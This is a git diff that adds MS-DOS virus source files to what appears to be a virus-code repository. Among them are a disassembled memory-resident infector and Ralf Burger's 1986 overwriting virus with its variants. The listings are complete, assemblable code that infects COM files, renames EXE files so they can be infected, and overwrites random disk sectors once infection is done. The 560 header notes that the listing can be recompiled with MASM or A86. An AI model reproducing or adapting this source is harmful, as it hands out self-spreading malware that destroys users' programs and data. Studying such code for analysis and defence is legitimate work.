;0013D B452 _R + INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _! + PUSH ES ;00141 06 _ + MOV SI,00F8h ;00142 BEF800 ___ + SUB DI,DI ;00145 2BFF +_ + LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_ + MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_ + MOV CX,0104h ;0014F B90401 ___ + REPZ MOVSW ;00152 F3A5 __ + MOV DS,CX ;DS_Chg ;00154 8ED9 __ + MOV DI,0016h ;00156 BF1600 ___ + MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_ + MOV [DI+70h],ES ;0015E 8C4570 _Ep + POP DS ;00161 1F _ + MOV [BX+14h],DX ;00162 895714 _W_ + MOV DX,CS ;00165 8CCA __ + MOV DS,DX ;DS_Chg ;00167 8EDA __ + MOV BX,[DI-14h] ;00169 8B5DEC _]_ + DEC BH ;0016C FECF __ + MOV ES,BX ;ES_Chg ;0016E 8EC3 __ + CMP DX,[DI] ;00170 3B15 ;_ + MOV DS,[DI] ;DS_Chg ;00172 8E1D __ + MOV DX,[DI] ;00174 8B15 __ + DEC DX ;00176 4A J + MOV DS,DX ;DS_Chg ;00177 8EDA __ + MOV SI,CX ;00179 8BF1 __ + MOV DX,DI ;0017B 8BD7 __ + MOV CL,28h ;0017D B128 _( + REPZ MOVSW ;0017F F3A5 __ + MOV DS,BX ;DS_Chg ;00181 8EDB __ + JB H00197 ;00183 7212 r_ + INT 20h ;B-TERM_norm:20h ;00185 CD20 _ +;--------------------------------------------------- +H00187: MOV SI,CX ;00187 8BF1 __ + MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\, + LODSW ;0018C AD _ + DEC SI ;0018D 4E N + TEST AX,AX ;0018E 85C0 __ + JNZ H0018C ;00190 75FA u_ + ADD SI,+03h ;00192 83C603 ___ + MOV DX,SI ;00195 8BD6 __ +H00197: MOV AH,3Dh ;00197 B43D _= + CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___ + MOV DX,[DI] ;0019C 8B15 __ + MOV [DI+04h],DX ;0019E 895504 _U_ + ADD [DI],CX ;001A1 010D __ + POP DX ;001A3 5A Z + PUSH DX ;001A4 52 R + PUSH CS ;001A5 0E _ + POP ES ;001A6 07 _ + PUSH CS ;001A7 0E _ + POP DS ;001A8 1F _ + PUSH DS ;001A9 1E _ + MOV AL,50h ;001AA B050 _P + PUSH AX ;001AC 50 P + MOV AH,3Fh ;001AD B43F _? + RET ;RET_Far ;001AF CB _ +;--------------------------------------------------- +H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _! + JB H001CD ;001B2 7219 r_ + MOV BX,AX ;001B4 8BD8 __ + PUSH BX ;001B6 53 S + MOV AX,1220h ;001B7 B82012 _ _ + INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/ + MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__ + MOV AX,1216h ;001BF B81612 ___ + INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/ + POP BX ;001C4 5B [ + PUSH ES ;001C5 06 _ + POP DS ;001C6 1F _ + ADD DI,+11h ;001C7 83C711 ___ + MOV CX,0200h ;001CA B90002 ___ +H001CD: RET ;RET_Near ;001CD C3 _ +;--------------------------------------------------- + STI ;001CE FB _ + PUSH ES ;001CF 06 _ + PUSH SI ;001D0 56 V + PUSH DI ;001D1 57 W + PUSH BP ;001D2 55 U + PUSH DS ;001D3 1E _ + PUSH CX ;001D4 51 Q + CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___ + MOV BP,CX ;001D8 8BE9 __ + MOV SI,[DI+04h] ;001DA 8B7504 _u_ + POP CX ;001DD 59 Y + POP DS ;001DE 1F _ + CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_ + JB H0020A ;001E2 7226 r& + CMP SI,BP ;001E4 3BF5 ;_ + JNB H0020A ;001E6 7322 s" + PUSH AX ;001E8 50 P + MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_ + NOT AL ;001ED F6D0 __ + AND AL,1Fh ;001EF 241F $_ + JNZ H00209 ;001F1 7516 u_ + ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5 + XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_ + ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_- + CALL H00211 ; . . . . . . . . . ;001FD E81100 ___ + MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_ + LAHF ;00204 9F _ + SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)- + SAHF ;00208 9E _ +H00209: POP AX ;00209 58 X +H0020A: POP BP ;0020A 5D ] + POP DI ;0020B 5F _ + POP SI ;0020C 5E ^ + POP ES ;0020D 07 _ + RET 0002h ;RET_Far:0002h ;0020E CA0200 ___ +;--------------------------------------------------- +H00211: MOV AH,3Fh ;00211 B43F _? + PUSHF ;00213 9C _ + PUSH CS ;00214 0E _ + CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_ + RET ;RET_Near ;00218 C3 _ +;--------------------------------------------------- + CMP AH,3Fh ;00219 80FC3F __? + JZ H001CE ;0021C 74B0 t_ + PUSH DS ;0021E 1E _ + PUSH ES ;0021F 06 _ + PUSH AX ;00220 50 P + PUSH BX ;00221 53 S + PUSH CX ;00222 51 Q + PUSH DX ;00223 52 R + PUSH SI ;00224 56 V + PUSH DI ;00225 57 W + CMP AH,3Eh ;00226 80FC3E __> + JZ H0023F ;00229 7414 t_ + CMP AX,4B00h ;0022B 3D004B =_K + MOV AH,3Dh ;0022E B43D _= + JZ H00241 ;00230 740F t_ + POP DI ;00232 5F _ + POP SI ;00233 5E ^ + POP DX ;00234 5A Z + POP CX ;00235 59 Y + POP BX ;00236 5B [ + POP AX ;00237 58 X + POP ES ;00238 07 _ + POP DS ;00239 1F _ +H0023A: JMP Word Ptr CS:[0004h] + ;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__ +;--------------------------------------------------- +H0023F: MOV AH,45h ;0023F B445 _E +H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_ + JB H00232 ;00244 72EC r_ + SUB AX,AX ;00246 2BC0 +_ + MOV [DI+04h],AX ;00248 894504 _E_ + MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__ + CLD ;0024F FC _ + MOV DS,AX ;DS_Chg ;00250 8ED8 __ + MOV SI,004Ch ;00252 BE4C00 _L_ + LODSW ;00255 AD _ + PUSH AX ;00256 50 P + LODSW ;00257 AD _ + PUSH AX ;00258 50 P + PUSH [SI+40h] ;00259 FF7440 _t@ + PUSH [SI+42h] ;0025C FF7442 _tB + LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_ + MOV AX,2513h ;00263 B81325 __% + INT 21h ;1-Set_Int_Vctr ;00266 CD21 _! + PUSH CS ;00268 0E _ + POP DS ;00269 1F _ + MOV DX,0204h ;0026A BA0402 ___ + MOV AL,24h ;0026D B024 _$ + INT 21h ;Indef_INT:21h-25h ;0026F CD21 _! + PUSH ES ;00271 06 _ + POP DS ;00272 1F _ + MOV AL,[DI-04h] ;00273 8A45FC _E_ + AND AL,1Fh ;00276 241F $_ + CMP AL,1Fh ;00278 3C1F <_ + JZ H00284 ;0027A 7408 t_ + MOV AX,[DI+17h] ;0027C 8B4517 _E_ + SUB AX,4F43h ;0027F 2D434F -CO + JNZ H002C3 ;00282 753F u? +H00284: XOR [DI-04h],AL ;00284 3045FC 0E_ + MOV AX,[DI] ;00287 8B05 __ + CMP AX,CX ;00289 3BC1 ;_ +;--------------------------------------------------- + DB "r6" ;0028B 7236 +;--------------------------------------------------- + ADD AX,CX ;0028D 03C1 __ + JB H002C3 ;0028F 7232 r2 + TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__ + JNZ H002C3 ;00295 752C u, + LDS SI,[DI-0Ah] ;00297 C575F6 _u_ + DEC AX ;0029A 48 H + SHR AH,1 ;0029B D0EC __ + AND AH,[SI+04h] ;0029D 226404 "d_ + JZ H002C3 ;002A0 7421 t! + MOV AX,0020h ;002A2 B82000 _ _ + MOV DS,AX ;DS_Chg ;002A5 8ED8 __ + SUB DX,DX ;002A7 2BD2 +_ + CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_ + MOV SI,DX ;002AC 8BF2 __ + PUSH CX ;002AE 51 Q + LODSB ;002AF AC _ + CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_ + JNZ H002DD ;002B4 7527 u' + LOOP H002AF ;002B6 E2F7 __ + POP CX ;002B8 59 Y + OR Byte Ptr ES:[DI-04h],1Fh + ;ES_Ovrd ;002B9 26804DFC1F &_M__ + OR Byte Ptr ES:[DI-0Bh],40h + ;ES_Ovrd ;002BE 26804DF540 &_M_@ +H002C3: MOV AH,3Eh ;002C3 B43E _> + CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_ + OR Byte Ptr ES:[DI-0Ch],40h + ;ES_Ovrd ;002C8 26804DF440 &_M_@ + POP DS ;002CD 1F _ + POP DX ;002CE 5A Z + MOV AX,2524h ;002CF B82425 _$% + INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _! + POP DS ;002D4 1F _ + POP DX ;002D5 5A Z + MOV AL,13h ;002D6 B013 __ + INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _! + JMP H00232 ;002DA E955FF _U_ +;--------------------------------------------------- +H002DD: POP CX ;002DD 59 Y + MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5 + MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_ + MOV AH,40h ;002E5 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _! + JB H002BE ;002E9 72D3 r_ + MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5 + MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_ + PUSH CS ;002F2 0E _ + POP DS ;002F3 1F _ + MOV DL,08h ;002F4 B208 __ + MOV AH,40h ;002F6 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _! + JMP Short H002B9 ;002FA EBBD __ +;--------------------------------------------------- + IRET ;002FC CF _ +;--------------------------------------------------- + DB "666" ;002FD 363636 +;--------------------------------------------------- + + +P00100 ENDP + +CODE ENDS + END H00100 + +;------------------------------------------------------------------------------- + +INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER + AH = 13h + DS:DX -> interrupt handler disk driver calls on read/write + ES:BX = address to restore INT 13 to on system halt (exit from root + shell) +Return: DS:DX from previous invocation of this function + ES:BX from previous invocation of this function +Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few + functions are still invoked via an INT 13 instruction + this is a dangerous security loophole for any virus-monitoring software + which does not trap this call (at least two viruses are known to use + it to get the original ROM entry point) diff --git a/MSDOS/Virus.MSDOS.Unknown.512.asm b/MSDOS/Virus.MSDOS.Unknown.512.asm new file mode 100644 index 00000000..6cfc94ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.512.asm @@ -0,0 +1,269 @@ +;PROGRAM NAME: 512.com +;------------------------------------------------- +H00100: MOV AH,30h + INT 21h ;DOS Version# + MOV SI,0004h + MOV DS,SI ;SEGMENT OPERATION + CMP Byte Ptr AH,1Eh + LDS AX,[SI+08h] + JB H0011B ; . . . . . . . . . + MOV AH,13h + INT 2Fh ;Print Spooler Ctrl + PUSH DS ;SEGMENT OPERATION + PUSH DX + INT 2Fh ;Print Spooler Ctrl + POP AX + POP DS ;SEGMENT OPERATION +H0011B: MOV DI,00F8h + STOSW + MOV AX,DS + STOSW + MOV DS,SI ;SEGMENT OPERATION + LDS AX,[SI+40h] + STOSW + CMP AX,0121h + MOV AX,DS + STOSW + PUSH ES ;SEGMENT OPERATION + PUSH DI + JNZ H00139 ; . . . . . . . . . + SHL Word Ptr SI,1 + MOV CX,0100h + REPZ + CMPSW +H00139: PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + JZ H00187 ; . . . . . . . . . + MOV AH,52h + INT 21h ;INDEF FUNCTION + PUSH ES ;SEGMENT OPERATION + MOV SI,00F8h + SUB DI,DI + LES AX,ES:[BX+12h] + MOV DX,ES:[DI+02h] + MOV CX,0104h + REPZ + MOVSW + MOV DS,CX ;SEGMENT OPERATION + MOV DI,0016h + MOV Word Ptr [DI+6E],0121h + MOV [DI+70h],ES + POP DS ;SEGMENT OPERATION + MOV [BX+14h],DX + MOV DX,CS + MOV DS,DX ;SEGMENT OPERATION + MOV BX,[DI-14h] + DEC Byte Ptr BH + MOV ES,BX ;SEGMENT OPERATION + CMP DX,[DI] + MOV DS,[DI] ;SEGMENT OPERATION + MOV DX,[DI] + DEC DX + MOV DS,DX ;SEGMENT OPERATION + MOV SI,CX + MOV DX,DI + MOV CL,08h + REPZ + MOVSW + MOV DS,BX ;SEGMENT OPERATION + JB H00197 ; . . . . . . . . . + INT 20h ;TERMINATE normally +;------------------------------------------------- +H00187: MOV SI,CX + MOV DS,[SI+2Ch] ;SEGMENT OPERATION +H0018C: LODSW ; . . . . . . . . . + DEC SI + TEST AX,AX + JNZ H0018C ; . . . . . . . . . + ADD Word Ptr SI,+03h + MOV DX,SI +H00197: MOV AH,3Dh + CALL H001B0 ; . . . . . . . . . + MOV DX,[DI] + MOV [DI+04h],DX + ADD [DI],CX + POP DX + PUSH DX + PUSH CS ;SEGMENT OPERATION + POP ES ;SEGMENT OPERATION + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + PUSH DS ;SEGMENT OPERATION + MOV AL,50h + PUSH AX + MOV AH,3Fh + RETF +;------------------------------------------------- +H001B0: INT 21h ;INDEF FUNCTION + JB H001CD ; . . . . . . . . . + MOV BX,AX +H001B6: PUSH BX + MOV AX,1220h + INT 2Fh ;Print Spooler Ctrl + MOV BL,ES:[DI] + MOV AX,1216h + INT 2Fh ;Print Spooler Ctrl + POP BX + PUSH ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + ADD Word Ptr DI,+11h + MOV CX,0200h +H001CD: RET +;------------------------------------------------- +H001CE: STI + PUSH ES ;SEGMENT OPERATION + PUSH SI + PUSH DI + PUSH BP + PUSH DS ;SEGMENT OPERATION + PUSH CX + CALL H001B6 ; . . . . . . . . . + MOV BP,CX + MOV SI,[DI+04h] + POP CX + POP DS ;SEGMENT OPERATION + CALL H00211 ; . . . . . . . . . + JB H0020A ; . . . . . . . . . + CMP SI,BP + JNB H0020A ; . . . . . . . . . + PUSH AX + MOV AL,ES:[DI-04h] + NOT Byte Ptr AL + AND AL,1Fh + JNZ H00209 ; . . . . . . . . . + ADD SI,ES:[DI] + XCHG SI,ES:[DI+04h] + ADD ES:[DI],BP ;SEGMENT OPERATION + CALL H00211 ; . . . . . . . . . + MOV ES:[DI+04h],SI ;SEGMENT OPERATION + LAHF + SUB ES:[DI],BP ;SEGMENT OPERATION + SAHF +H00209: POP AX +H0020A: POP BP + POP DI + POP SI + POP ES ;SEGMENT OPERATION + RETF 0002h +;------------------------------------------------- +H00211: MOV AH,3Fh +H00213: PUSHF + PUSH CS ;SEGMENT OPERATION + CALL H0023A ; . . . . . . . . . + RET +;------------------------------------------------- + CMP Byte Ptr AH,3Fh + JZ H001CE ; . . . . . . . . . + PUSH DS ;SEGMENT OPERATION + PUSH ES ;SEGMENT OPERATION + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + CMP Byte Ptr AH,3Eh + JZ H0023F ; . . . . . . . . . + CMP AX,4B00h + MOV AH,3Dh + JZ H00241 ; . . . . . . . . . +H00232: POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POP ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION +H0023A: JMP Far CS:[H00004h] +;------------------------------------------------- +H0023F: MOV AH,45h +H00241: CALL H001B0 ; . . . . . . . . . + JB H00232 ; . . . . . . . . . + SUB AX,AX + MOV [DI+04h],AX + MOV Byte Ptr [DI-0Fh],02h + CLD + MOV DS,AX ;SEGMENT OPERATION + MOV SI,004Ch + LODSW ; . . . . . . . . . + PUSH AX + LODSW ; . . . . . . . . . + PUSH AX + PUSH [SI+40h] + PUSH [SI+42h] + LDS DX,CS:[SI-50h] + MOV AX,2513h + INT 21h ;Set Intrpt Vector + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV DX,0204h + MOV AL,24h + INT 21h ;Write Random Rcds + PUSH ES ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV AL,[DI-04h] + AND AL,1Fh + CMP AL,1Fh + JZ H00284 ; . . . . . . . . . + MOV AX,[DI+17h] + SUB AX,4F43h + JNZ H002C3 ; . . . . . . . . . +H00284: XOR [DI-04h],AL + MOV AX,[DI] + CMP AX,CX + JB H002C3 ; . . . . . . . . . + ADD AX,CX + JB H002C3 ; . . . . . . . . . + TEST Byte Ptr [DI-0Dh],04h + JNZ H002C3 ; . . . . . . . . . + LDS SI,[DI-0Ah] + DEC AX + SHR Byte Ptr AH,1 + AND AH,[SI+04h] + JZ H002C3 ; . . . . . . . . . + MOV AX,0020h + MOV DS,AX ;SEGMENT OPERATION + SUB DX,DX + CALL H00211 ; . . . . . . . . . + MOV SI,DX + PUSH CX +H002AF: LODSB ; . . . . . . . . . + CMP AL,CS:[SI+07h] + JNZ H002DD ; . . . . . . . . . + LOOP H002AF ; . . . . . . . . . + POP CX +H002B9: OR Byte Ptr ES:[DI-04h],1Fh +H002BE: OR Byte Ptr ES:[DI-0Bh],40h +H002C3: MOV AH,3Eh + CALL H00213 ; . . . . . . . . . + OR Byte Ptr ES:[DI-0Ch],40h + POP DS ;SEGMENT OPERATION + POP DX + MOV AX,2524h + INT 21h ;Set Intrpt Vector + POP DS ;SEGMENT OPERATION + POP DX + MOV AL,13h + INT 21h ;Write Random Rcds + JMP H00232 +;------------------------------------------------- +H002DD: POP CX + MOV SI,ES:[DI] + MOV ES:[DI+04h],SI ;SEGMENT OPERATION + MOV AH,40h + INT 21h ;Write File/Device + JB H002BE ; . . . . . . . . . + MOV ES:[DI],SI ;SEGMENT OPERATION + MOV ES:[DI+04h],DX ;SEGMENT OPERATION + PUSH CS ;SEGMENT OPERATION + POP DS ;SEGMENT OPERATION + MOV DL,08h + MOV AH,40h + INT 21h ;Write File/Device + JMP Short H002B9 +;------------------------------------------------- + IRET +;------------------------------------------------- + ADD SS:[BX+SI],AL ;SEGMENT OPERATION + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.541.asm b/MSDOS/Virus.MSDOS.Unknown.541.asm new file mode 100644 index 00000000..cfdc5a30 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.541.asm @@ -0,0 +1,446 @@ + page 70,120 + Name VIRUS +;************************************************************************* + +; Program Virus Ver.: 1.1 +; Copyright by R. Burger 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replicate itself, +; and thereby modify other programs +;************************************************************************* + + + +Code Segment + Assume CS:Code +progr equ 100h + ORG progr + +;************************************************************************* + +; The three NOP's serve as the marker byte of the +; virus which will allow it to identify a virus +;************************************************************************* + +MAIN: + nop + nop + nop + +;************************************************************************* + +; Initialize the pointers +;************************************************************************* + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +;************************************************************************* + +; Get the selected drive +;************************************************************************* + + mov ah,19h ; drive? + int 21h + +;************************************************************************* + +; Get the current path on the current drive +;************************************************************************* + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive + lea si,cs:old_path + int 21h + +;************************************************************************* + +; Get the number of drives present. +; If only one drive is present, the pointer for +; search order will be set to search order + 6 +;************************************************************************* + + mov ah,0eh ; how many disks + mov dl,0 ; + int 21h + + mov al,01 + cmp al,01 ; one drive? + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +;************************************************************************* + +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM file and infected. +; This causes the error message "Program too lrage +; to fit in memory" when starting larger infected +; EXE programs. +;************************************************************************* + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ; .EXE found? + +;************************************************************************* + +; If neither .COM nor .EXE is found, then sectors will +; be overwritten depending on the system time in +; milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can find +; nothing more to infect and starts its destruction. +;************************************************************************* + + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +;************************************************************************* + +; Check if the end of the search order table has been +; reached. If so, end. +;************************************************************************* + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +;************************************************************************* + +; Get new drive from search order table and +; select it. +;************************************************************************* + +hups2: + mov ah,0eh + int 21h ; change disk + +;************************************************************************* + +; Start in the root directory +;************************************************************************* + + mov ah,3bh ; change path + lea dx,path + int 21h + jmp find_first_file + +;************************************************************************* + +; Starting from the root, search for the first subdir +; First convert all .EXE files to .COM in the old +; directory. +;************************************************************************* + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ; use root dir + lea dx,path + int 21h + mov ah,04eh ;Search for first subdirectory + mov cx,00010001b ; dir mask + lea dx,maske_dir + int 21h + jc change_disk + + mov bx,CS:counter + INC BX + DEC bx + jz use_next_subdir + +;************************************************************************* + +; Search for the next subdir. If no more directories +; are found, the drive will be changed. +;************************************************************************* + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +;************************************************************************* + +; Select found directory +;************************************************************************* + +use_next_subdir: + mov ah,2fh ; get dta address + int 21h + add bx,1ch + mov es:[bx],'\ ' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +;************************************************************************* + +; Find first .COM file in the current directory. +; If there are non, search the next directory. +;************************************************************************* + +find_first_file: + mov ah,04eh ; Search for first + mov cx,00000001b ; mask + lea dx,maske_com ; + int 21h + jc find_first_subdir + jmp check_if_ill + +;************************************************************************* + +; If the program is already infected, search for +; the next program. +;************************************************************************* + +find_next_file: + mov ah,4fh ; search for next + int 21h + jc find_first_subdir + +;************************************************************************* + +; Check if already infected by the virus. +;************************************************************************* + +check_if_ill: + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3fh ; read file + mov cx,buflen ; + mov dx,buffer ; write in buffer + int 21h + mov ah,3eh ; CLODE FILE + int 21h + +;************************************************************************* + +; Here we search for three NOP's. +; If present, there is already an infection. We must +; then continue the search. +;************************************************************************* + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +;************************************************************************* + +; Bypass MS-DOS write protection if present +;************************************************************************* + + mov ah,43h ; write enable + mov al,0 + mov dx,9eh ; address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +;************************************************************************* + +; Open file for write access. +;************************************************************************* + + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + +;************************************************************************* + +; Read date entry of program and save for future use. +;************************************************************************* + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save date + push dx + +;************************************************************************* + +; The jump located at address 0100h of the program +; will be saved for future use. +;************************************************************************* + + mov dx,cs:[conta] ; save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ; save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +;************************************************************************* + +; The virus copies itself to the start of the file +;************************************************************************* + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +;************************************************************************* + +; Enter the old creation date of the file. +;************************************************************************* + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +;************************************************************************* + +; Close the file. +;************************************************************************* + + mov ah,3eh ; close file + int 21h + +;************************************************************************* + +; restore the old jump address. +; The virus saves at address "conta' the jump which +; was at the start of the host program. +; This is done to preserve the executability of the +; host program as much as possible. +; After saving itstill works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory +; +;************************************************************************* + + mov dx,cs:[jmpbuf] ; restore old jmp + mov cs:[conta],dx +hops: nop + call use_old + +;************************************************************************* + +; Continue with the host program. +;************************************************************************* + +cont db 0e9h ; make jump +conta dw 0 + mov ah,00 + int 21h + +;************************************************************************* + +; reactivate the selected drive at the start of the +; program. +;************************************************************************* + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +;************************************************************************* + +; Reactivate the selected path at the start of the +; program. +;************************************************************************* + + mov ah,3bh ; use old dir + lea dx,old_path-1 ; get old path and backslash + int 21h + ret + + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 ; pointer f. search order +counter dw 0000 ; counter f. nth search +disks db 0 ; number of disks + + +maske_com db "*.com",00 ; search for com files +maske_dir db "*",00 ; search dir's +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h ; a safe place + +buflen equ 230h ; length of virus !!!!!! + ; careful + ; if changing !!!!!! + +jmpbuf equ buffer+buflen ; a safe place for jump +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" +old_path db 32 dup(?) ; old path + +code ends + +end main + +;************************************************************************* +; WHAT THE PROGRAM DOES: +; +; When the program is started, the first COM file in the root +; directory is infected. You can't see any changes to the +; directory entries. But if you look at the hex dump of an +; infected program, you can see the marker, which in this case +; consists of three NOP's (hex 90). WHen the infected program +; is started, the virus will first replicate itself, and then +; try to run the host program. It may run or it may not, but +; it will infect another program. This continues until all +; the COM files are infected. The next time it is run, all +; of the EXE files are changed to COM files so that they can +; be infected. In addition, the manipulation task of the virus +; begins, which consists of the random destruction of disk +; sectors. +;************************************************************************* +  \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.560.asm b/MSDOS/Virus.MSDOS.Unknown.560.asm new file mode 100644 index 00000000..988d5204 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.560.asm @@ -0,0 +1,464 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +PAGE 70,120 + +;; +;; +;; Name Virus: 541-Virus 14 Sept 1990 +;; Suggested Alias: NOP-Virus +;; Variant: 537-Virus, 560-Virus +;; +;; Last Reported: September 1990 +;; 'Isolated': The Hague, The Netherlands +;; by: Righard Zwienenberg 2:512/2.3@fidonet +;; +;; Author: Ralf Burger in 1986 for his book: +;; VIRUSES, A HIGH TECHNICAL DISEASE +;; +;; +;; The code of this virus was built into a MOVE-util. It was imple- +;; mented wrong. The virus went straight to the destruction code. +;; I've taken the code out and reconstructed it to its original +;; form. Because I had a listing of Ralf Burger's book I have placed +;; his own comments behind the code, although I've translated it into +;; English. The labels used, are also his. +;; +;; I've put three comments myself in the code. These can be recog- +;; nized by the starting ;; of it. +;; +;; Edwin Cleton, the one who send me the MOVE util for examination +;; downloaded it from a BBS. So far there are no damage reports. +;; The move-util checked the system's date. If the date is 1 Aug +;; or later of any year, the virus was called. +;; +;; +;; +;; This sourcelisting can be recompiled with MASM 4.0+ and A86. For +;; compilation with A86 you must specify 'conta' and 'disks' as a word +;; else the definition will conflict with what A86 previously thinks. +;; +;; +;; +;; Virus-Description: +;; ------------------ +;; +;; The virus infects the first COM-file in the ROOT-Directory. The +;; virus overwrites the first 230h bytes of the file. When an infected +;; file is executed it will infect one other .COM-file. The system will +;; crash mostly afterwards because the overwritten part is not stored. +;; When COMMAND.COM is infected on the HDU, the system will not reboot +;; because COMMAND.COM is complete. Each reboot COMMAND.COM will infect +;; one other .COM-File and the computer crashes. When all .COM-files +;; are infected, .EXE-files will be renamed (FCB) to .COM to become +;; infected. When all .COM and .EXE-files are infected, the virus will +;; write to sectors on disk depending on the system's time. +;; The infected files are lost en must be replaced by backup-copies. +;; +;; The shortest size an infected file can be is 230h bytes. The code is +;; shorter, but this is the value which has been put into the code as +;; the virus-length. +;; +;; + + +Code Segment + Assume CS:Code +progr equ 100h + org progr + +; +; The three NOP's are set as a identifier for the virus. This way +; the virus knows this copy is already infected. +; + +MAIN: + nop + nop + nop + +; +; Init the Pointers +; + + mov ax,0 + mov 